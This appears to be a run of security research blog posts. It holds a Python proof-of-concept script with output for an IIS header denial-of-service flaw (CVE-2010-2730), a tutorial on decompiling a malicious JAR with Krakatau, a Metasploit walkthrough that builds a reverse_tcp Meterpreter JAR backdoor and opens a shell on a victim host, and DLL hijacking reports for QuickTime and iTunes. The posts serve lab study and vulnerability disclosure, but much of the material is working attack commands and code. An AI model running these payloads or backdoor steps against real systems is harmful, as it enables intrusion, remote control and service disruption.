If FastCGI installation is successful accessing<br />
<span style="font-family: Courier New, Courier, monospace;">http://localhost/phpinfo.cgi</span><br />
should show below page. I created the page phpinfo.php under<br />
<span style="font-family: Courier New, Courier, monospace;">C:\Inetpub\wwwroot\</span><br />
make sure the directory has proper permissions.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWwk8DmcrQe0f0UdLcpXvsxKmFErcIZ8UZNfwqlyKNEpuzvjQ1r3ePGSa3ENLfjdwemnTZg9kS7OJ5SnSkiMT5HBsIsalBaPGsssSbo2TKNzwVy_vS5u-4RiuzHHI6IWvXcIgwjsyu4lWd/s1600/IIS7.0_phpinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWwk8DmcrQe0f0UdLcpXvsxKmFErcIZ8UZNfwqlyKNEpuzvjQ1r3ePGSa3ENLfjdwemnTZg9kS7OJ5SnSkiMT5HBsIsalBaPGsssSbo2TKNzwVy_vS5u-4RiuzHHI6IWvXcIgwjsyu4lWd/s1600/IIS7.0_phpinfo.png" height="204" width="320" /></a></div>
<br />
<b>Proof of Concept</b><br />
<pre>#!/usr/bin/python
import os, sys
import urllib2
def main(all_args):
print "in main"
if len(all_args) != 3:
print "invalid args"
print "usage:\n\t%s server_ip_addr http_port"%(all_args[0])
sys.exit();
headers = {"Host":all_args[1],
"Accept": "text/html,application/xhtml+xml,application/xml",
"Accept-Language": "en-us",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
"Keep-Alive": "115",
"Connection": "keep-alive"}
for k,v in headers.items():
print (k, v)
#create junk headers
print "Creating junk Request Headers"
for i in range(1,400):
junk_header = "My-Name" + str(i)
value = "Praveen Darshanam" + str(i)
headers.update({junk_header: value})
url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php"
#url = "http://" + all_args[1] + "/info.php"
print "url: " + url
#data = "From Praveen Darshanam"
#req = urllib2.Request(url, data, headers)
req = urllib2.Request(url, None, headers)
response = urllib2.urlopen(req)
print "Response Length =" + str(len(response.read()))
if __name__ == "__main__":
print "sys.argv=" + str(sys.argv)
main(sys.argv)</pre>
<br />
<b>Usage</b><br />
<span style="font-family: Courier New, Courier, monospace;">./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py server_ip_addr http_port</span><br />
<span style="font-family: Courier New, Courier, monospace;">praveend@praveend-VirtualBox:~$</span><br />
<span style="color: #cc0000; font-family: Courier New, Courier, monospace;">$ ./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py 192.168.56.110 80</span><br />
<span style="font-family: Courier New, Courier, monospace;">sys.argv=['./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py', '192.168.56.110', '80']</span><br />
<span style="font-family: Courier New, Courier, monospace;">in main</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Accept-Language', 'en-us')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Connection', 'keep-alive')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Accept', 'text/html,application/xhtml+xml,application/xml')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Keep-Alive', '115')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Host', '192.168.56.110')</span><br />
<span style="font-family: Courier New, Courier, monospace;">Creating junk Request Headers</span><br />
<span style="font-family: Courier New, Courier, monospace;">url: http://192.168.56.110:80/phpinfo.php</span><br />
<span style="font-family: Courier New, Courier, monospace;">Response Length =119639</span><br />
<br />
<b>Exploit Traffic</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQRi8SRzLQYOP_v5_R5WR12AFKaZQtFEfRRs9-Zj_PmSnZz3VWmHa0CK1t9LMkRKrrV6BbFeabTFwd2Tl7V5QVjD9GM3QVy3PEV1YOlyjLMWsA83KEwf1jQvrNCf68DmtR1bpFkIriLNs/s1600/pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQRi8SRzLQYOP_v5_R5WR12AFKaZQtFEfRRs9-Zj_PmSnZz3VWmHa0CK1t9LMkRKrrV6BbFeabTFwd2Tl7V5QVjD9GM3QVy3PEV1YOlyjLMWsA83KEwf1jQvrNCf68DmtR1bpFkIriLNs/s1600/pcap.png" height="253" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I didn't see any crash after sending multiple fake headers, not sure if I interpreted the Vulnerability in correct manner.<br />
<br />
<b>References</b><br />
<a href="https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx">https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx</a><br />
<a href="http://www.iis.net/configreference/system.webserver/fastcgi">http://www.iis.net/configreference/system.webserver/fastcgi</a><br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730</a><br />
<a href="http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html">http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html</a><br />
<a href="http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html">http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html</a><br />
<a href="https://technet.microsoft.com/library/security/ms10-065">https://technet.microsoft.com/library/security/ms10-065</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com2tag:blogger.com,1999:blog-1852980805947568568.post-8957962806407952922015-02-22T12:18:00.001+05:302015-02-22T12:18:10.509+05:30Java Malware: Java Decompilers for JAR Malware AnalysisKrakatau comes with three tools, an assembler, disassembler and a decompiler.<br />
From the author of Krakatau, Robert Grosse<br />
<i>" The Krakatau decompiler takes a different approach to most Java decompilers.</i><br />
<i> It can be thought of more as a compiler whose input language is Java bytecode</i><br />
<i> and whose target language happens to be Java source code. Krakatau takes in</i><br />
<i> arbitrary bytecode, and attempts to transform it to equivalent Java code. This</i><br />
<i> makes it robust to minor obfuscation, though it has the drawback of not</i><br />
<i> reconstructing the "original" source, leading to less readable output than a</i><br />
<i> pattern matching decompiler would produce for unobfuscated Java classes." </i><br />
<br />
decompile.py can extract class files from a .jar file and decompiles the extracted .class file to Java code (.java). Below command decompiles .class file to .java file and places the file in praveendecompile directory.<br />
<span style="color: #cc0000;">$ python decompile.py -path . hello.class -out praveendecompile/</span><br />
<br />
Dissecting the command<br />
$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar<br />
-out output directory<br />
-path path to core language classes, directories etc<br />
-skip continue upon errors<br />
<br />
<span style="color: #cc0000;">$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar</span><br />
<span style="font-family: Courier New, Courier, monospace;">Krakatau Copyright (C) 2012-14 Robert Grosse</span><br />
<span style="font-family: Courier New, Courier, monospace;">This program is provided as open source under the GNU General Public License.</span><br />
<span style="font-family: Courier New, Courier, monospace;">See LICENSE.TXT for more details.</span><br />
<span style="font-family: Courier New, Courier, monospace;">Attempting to automatically locate the standard library...</span><br />
<span style="font-family: Courier New, Courier, monospace;">Found at /usr/lib/jvm/java-1.7.0-openjdk-i386/jre/lib/rt.jar</span><br />
<span style="font-family: Courier New, Courier, monospace;">processing target plugins/Server, 2 remaining</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading plugins/Server</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/Object</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/Throwable</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/io/Serializable</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/IllegalMonitorStateException</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/RuntimeException</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/Exception</span><br />
<span style="font-family: Courier New, Courier, monospace;">Decompiling method </span><init><span style="font-family: Courier New, Courier, monospace;"> ()V<br />Decompiling method onLine ()V<br />Decompiling method offLine ()V<br />Decompiling method getId ()Ljava/lang/String;<br /><b>Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/plugins/Server.java</b><br />0.369355201721 seconds elapsed<br />processing target Main, 1 remaining<br />Loading Main<br />Loading java/lang/ClassLoader<br />Loading java/io/InputStream<br />Loading java/io/Closeable<br />Loading java/lang/AutoCloseable<br />Loading java/io/ByteArrayInputStream<br />Loading java/io/PrintStream<br />Loading java/io/FilterOutputStream<br />Loading java/io/OutputStream<br />Loading java/io/Flushable<br />Loading java/lang/Appendable<br />Loading java/lang/String<br />Loading java/lang/Comparable<br />Loading java/lang/CharSequence<br />Loading java/util/jar/JarInputStream<br />Loading java/util/zip/ZipInputStream<br />Loading java/util/zip/InflaterInputStream<br />Loading java/io/FilterInputStream<br />Loading java/util/zip/ZipConstants<br />Loading java/lang/OutOfMemoryError<br />Loading java/lang/VirtualMachineError<br />Loading java/lang/Error<br /><b>Decompiling method iiIiiiiiii </b>([BLjava/lang/String;)Ljava/util/jar/JarInputStream;<br />Loading java/util/HashMap<br />Loading java/util/AbstractMap<br />Loading java/util/Map<br />Loading java/lang/Cloneable<br />Loading java/lang/ClassCastException<br />Loading java/lang/NullPointerException<br />Decompiling method getResourceAsStream (Ljava/lang/String;)Ljava/io/InputStream;<br />Loading java/util/jar/JarEntry<br />Loading java/util/zip/ZipEntry<br /><b>Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd </b>(Ljava/util/jar/JarEntry;)Ljava/lang/String;<br />Loading java/lang/ClassNotFoundException<br />Loading java/lang/ReflectiveOperationException<br />Loading java/lang/Class<br />Loading java/lang/reflect/GenericDeclaration<br />Loading java/lang/reflect/Type<br />Loading java/lang/reflect/AnnotatedElement<br />Decompiling method findClass (Ljava/lang/String;)Ljava/lang/Class;<br />Decompiling method iiIiiiiiii (Ljava/util/jar/JarInputStream;)V<br />Loading java/io/ByteArrayOutputStream<br />Decompiling method </span><init><span style="font-family: Courier New, Courier, monospace;"> ()V<br />Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/util/jar/JarInputStream;)Ljava/util/jar/JarEntry;<br />Decompiling method iiIiiiiiii ()V<br />Loading java/lang/StackTraceElement<br />Loading java/lang/StringBuffer<br />Loading java/lang/AbstractStringBuilder<br />Loading java/lang/ArrayIndexOutOfBoundsException<br />Loading java/lang/IndexOutOfBoundsException<br />Loading java/lang/NegativeArraySizeException<br />Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;)Ljava/lang/String;<br />Loading java/lang/reflect/Method<br />Loading java/lang/reflect/AccessibleObject<br />Loading java/lang/reflect/Member<br />Decompiling method main ([Ljava/lang/String;)V<br />Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;[B)Ljava/lang/Class;<br />Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ()Ljava/io/InputStream;<br />Loading java/io/Reader<br />Loading java/lang/Readable<br />Loading java/io/InputStreamReader<br />Loading java/io/BufferedReader<br />Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/InputStream;)Ljava/lang/String;<br />Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/ByteArrayOutputStream;)[B<br />Decompiling method loadClass (Ljava/lang/String;)Ljava/lang/Class;<br />Loading java/lang/StringBuilder<br />Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ([BLjava/lang/String;)[B<br /><b>Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/Main.java</b><br />15.0299580097 seconds elapsed</span><br />*********************************************************</init></init><br />
Highlighted the importand parts of the decompilation<br />
<br />
Above decompilation creates couple of files under temp_praveen directory<br />
<span style="font-family: Courier New, Courier, monospace;">praveend@praveend-VirtualBox:~/javadecompilers/Krakatau/temp_praveen$</span><br />
<span style="font-family: Courier New, Courier, monospace;">$ ls -R</span><br />
<span style="font-family: Courier New, Courier, monospace;">Main.java plugins</span><br />
<span style="font-family: Courier New, Courier, monospace;">./plugins:</span><br />
<span style="font-family: Courier New, Courier, monospace;">Server.java</span><br />
<div>
<br /></div>
<div>
Rename 2f8d204b747ed971a8bc8927b2e0898c.jar to 2f8d204b747ed971a8bc8927b2e0898c.zip and unzip the zip file (unzip on .jar file might work, did not try though)</div>
<div>
<div>
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$</div>
<div>
<span style="color: #cc0000;">$ unzip 2f8d204b747ed971a8bc8927b2e0898c.zip </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Archive: 2f8d204b747ed971a8bc8927b2e0898c.zip</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: META-INF/MANIFEST.MF </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: MANIFEST.MF </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: ID </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: plugins/Server.class </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: Main.class </span> </div>
<div>
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$</div>
</div>
<div>
<br /></div>
disassemble.py takes class or jar file as input and converts it to assembly language format and the output can be reassembled. The ouput is saved into .j file. If jar file is input it disassembles all the class files part of jar into .j files.<br />
<span style="color: #cc0000;">python disassemble.py Main.class</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">$ python ../disassemble.py Main.class </span><br />
<span style="font-family: Courier New, Courier, monospace;">processing target Main.class, 1/1 remaining</span><br />
<span style="font-family: Courier New, Courier, monospace;">Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/Main.j</span><br />
<span style="font-family: Courier New, Courier, monospace;">0.280933856964 seconds elapsed</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs_aJJYrxXhZABwmUIT91DEJVNinlGr1oTTygF-yd0pmrBylJ22fjNFGquRQAwr4P2opmcbxL1GQbYW4QhizVdlb24iOEn5XIRJvQu07ogJiI9ur_UWSkf3q-AIC63npuk0I0_v1o4ioWP/s1600/disassembled_code_snippet_mainj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs_aJJYrxXhZABwmUIT91DEJVNinlGr1oTTygF-yd0pmrBylJ22fjNFGquRQAwr4P2opmcbxL1GQbYW4QhizVdlb24iOEn5XIRJvQu07ogJiI9ur_UWSkf3q-AIC63npuk0I0_v1o4ioWP/s1600/disassembled_code_snippet_mainj.png" height="218" width="400" /></a></div>
<br />
javap binary is included with the JDK installation. javap can be used to see the bytecode of a class<br />
<div>
<span style="color: #cc0000;">$javap -c Main.class</span> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjPd7EULpjhmoKo97NLutVn8Y0Nozz1a_x59sIvGtmkURTgiBY-x9xQ1FAywPxRBMXrSP9rqCH4GIS3FlaJga_DUHXe3kZ2JDKIy13VjTt9q9jAwlvbD6czOsfXuiJupGEuEg1C3YfJGcS/s1600/disassembled_code_snippet_javap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjPd7EULpjhmoKo97NLutVn8Y0Nozz1a_x59sIvGtmkURTgiBY-x9xQ1FAywPxRBMXrSP9rqCH4GIS3FlaJga_DUHXe3kZ2JDKIy13VjTt9q9jAwlvbD6czOsfXuiJupGEuEg1C3YfJGcS/s1600/disassembled_code_snippet_javap.png" height="200" width="400" /></a></div>
<br />
assemble.py is used to convert byte code(.j) to class file. JVM class file format<br />
<span style="color: #cc0000;">python assemble.py Main.j</span><br />
<span style="color: #cc0000;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">$ python ../../assemble.py Server.j</span><br />
<span style="font-family: Courier New, Courier, monospace;">Processing file Server.j, 1/1 remaining</span><br />
<span style="font-family: Courier New, Courier, monospace;">Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/plugins/Server.class</span><br />
<br />
Java malware might use different obfuscation techniques to make it difficult for Malware Analyst and detection devices.Errors encountered while decompilation might need to be fixed manually.<br />
<br />
<a href="http://research.zscaler.com/2013/08/malicious-jar-files-hosted-on-google.html">http://research.zscaler.com/2013/08/malicious-jar-files-hosted-on-google.html</a><br />
<a href="http://stackoverflow.com/questions/27340147/how-to-decompile-class-and-jar-file-using-storyyeller-krakatau">http://stackoverflow.com/questions/27340147/how-to-decompile-class-and-jar-file-using-storyyeller-krakatau</a><br />
<a href="https://github.com/Storyyeller/Krakatau/blob/master/README.TXT">https://github.com/Storyyeller/Krakatau/blob/master/README.TXT</a><br />
<a href="https://raw.githubusercontent.com/Storyyeller/Krakatau/master/Documentation/assembler.txt">https://raw.githubusercontent.com/Storyyeller/Krakatau/master/Documentation/assembler.txt</a><br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com3tag:blogger.com,1999:blog-1852980805947568568.post-60435491939169204432015-02-21T01:09:00.000+05:302015-02-21T01:09:05.721+05:30Compromising machines running Linux using Metasploit JAR BackdoorsWe can compromise Windows machine using malicious EXE file acting as a backdoor generated using Metasploit. Machines running Linux can be compromised using jar backdoors.<br />
<br />
Creating jar backdoor file using Metasploit msfpayload to hack Linux box<br />
<span style="color: #cc0000;">root@kali-praveend-attacker:~# msfpayload java/meterpreter/reverse_tcp LHOST=1.1.1.32 LPORT=8888 R > compromise.jar</span><br />
[!] ************************************************************************<br />
[!] * The utility msfpayload is deprecated! *<br />
[!] * It will be removed on or about 2015-06-08 *<br />
[!] * Please use msfvenom instead *<br />
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *<br />
[!] ************************************************************************<br />
<br />
Execute the jar file created above on Linux box<br />
<span style="color: #cc0000;">praveen@victim:/tmp$ sudo java -jar compromise.jar</span><br />
<br />
On Kali Execute below commands so that victim will connect back to the attacker when victim executes JAR backdoor<br />
<span style="color: #cc0000;">msf > use exploit/multi/handler</span><br />
<span style="color: #cc0000;">msf exploit(handler) > set payload java/meterpreter/reverse_tcp</span><br />
<span style="color: #cc0000;">msf exploit(handler) > set LHOST 1.1.1.32</span><br />
<span style="color: #cc0000;">LHOST => 1.1.1.32</span><br />
<span style="color: #cc0000;">msf exploit(handler) > set LPORT 8888</span><br />
<span style="color: #cc0000;">LPORT => 8888</span><br />
<span style="color: #cc0000;">msf exploit(handler) > exploit</span><br />
<span style="color: #cc0000;">msf exploit(handler) > show options</span><br />
<span style="font-family: Courier New, Courier, monospace;">Module options (exploit/multi/handler):</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Name Current Setting Required Description</span><br />
<span style="font-family: Courier New, Courier, monospace;"> ---- --------------- -------- -----------</span><br />
<span style="font-family: Courier New, Courier, monospace;">Payload options (java/meterpreter/reverse_tcp):</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Name Current Setting Required Description</span><br />
<span style="font-family: Courier New, Courier, monospace;"> ---- --------------- -------- -----------</span><br />
<span style="font-family: Courier New, Courier, monospace;"> LHOST 1.1.1.32 yes The listen address</span><br />
<span style="font-family: Courier New, Courier, monospace;"> LPORT 8888 yes The listen port</span><br />
<span style="font-family: Courier New, Courier, monospace;">Exploit target:</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Id Name</span><br />
<span style="font-family: Courier New, Courier, monospace;"> -- ----</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0 Wildcard Target</span><br />
<span style="color: #cc0000;">msf exploit(handler) > exploit</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Started reverse handler on 1.1.1.32:8888</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Starting the payload handler...</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Sending stage (30355 bytes) to 1.1.1.40</span><br />
<span style="font-family: Courier New, Courier, monospace;">[*] Meterpreter session 1 opened (1.1.1.32:8888 -> 1.1.1.40:33457) at 2015-02-15 17:49:04 -0500</span><br />
<br />
Post exploitation commands<br />
<span style="color: #cc0000;">meterpreter > sysinfo</span><br />
Computer : victim<br />
OS : Linux 3.13.0-32-generic (amd64)<br />
Meterpreter : java/java<br />
<span style="color: #cc0000;">meterpreter > pwd</span><br />
/tmp<br />
<br />
Creating jar file from class file.<br />
<span style="color: #cc0000;">root@kali-ucs:~/rmx_remote# jar cvf compromise.jar EvilMBean.class</span><br />
added manifest<br />
adding: EvilMBean.class(in = 172) (out= 134)(deflated 22%)<br />
<div>
<br /></div>
<div>
<br /></div>
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com1tag:blogger.com,1999:blog-1852980805947568568.post-30007963646625728722015-02-14T19:30:00.002+05:302015-02-14T19:30:41.293+05:30Apple QuickTimePlayer Insecure DLL Loading Code ExecutionBy default QuickTimePlayer installation does't come with CoreFoundation.dll but QT Player tries to load the DLL when started.<br />
<br />
Create any malicious DLL and rename it to CoreFoundation.dll, copy to C:\Program Files (x86)\QuickTime\<br />
<br />
After copying the DLL if we start QuickTimePlayer we will execute the code part of malicious DLL leading to DLL Injection.<br />
<br />
Location: C:\Program Files (x86)\QuickTime\CoreFoundation.dll<br />
Application: QuickTime 7.7.2<br />
OS: Windows 7 Ultimate N SP1<br />
<br />
Apples response<br />
<i>After examining your report we do not see any actual security implications. </i><br />
<i> Writing a file to the C:\Program Files (x86)\QuickTime directory requires local </i><br />
<i> administrative privileges.</i><br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0tag:blogger.com,1999:blog-1852980805947568568.post-60706942007904968672015-02-14T19:28:00.001+05:302015-02-14T19:29:07.537+05:30Apple iTunes Insecure DLL Loading Code ExecutionBy default iTunes installation does't come with dwmapi.dll but iTunes tries to load the DLL when started.<br />
<br />
Create any malicious DLL and rename it to dwmapi.dll, copy to C:\Program Files (x86)\iTunes\<br />
<br />
After copying the DLL if we start iTunes will execute the code part of malicious DLL leading to DLL Injection.<br />
<br />
Location: C:\Program Files (x86)\iTunes\dwmapi.dll<br />
Application:iTunes 12.0.1.26<br />
OS: Windows 7 Ultimate N SP1<br />
<br />
Apples response<br />
<i>After examining your report we do not see any actual security implications. </i><br />
<i> Writing a file to the C:\Program Files (x86)\iTunes directory requires local </i><br />
<i> administrative privileges.</i><br />
<i><br /></i>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com0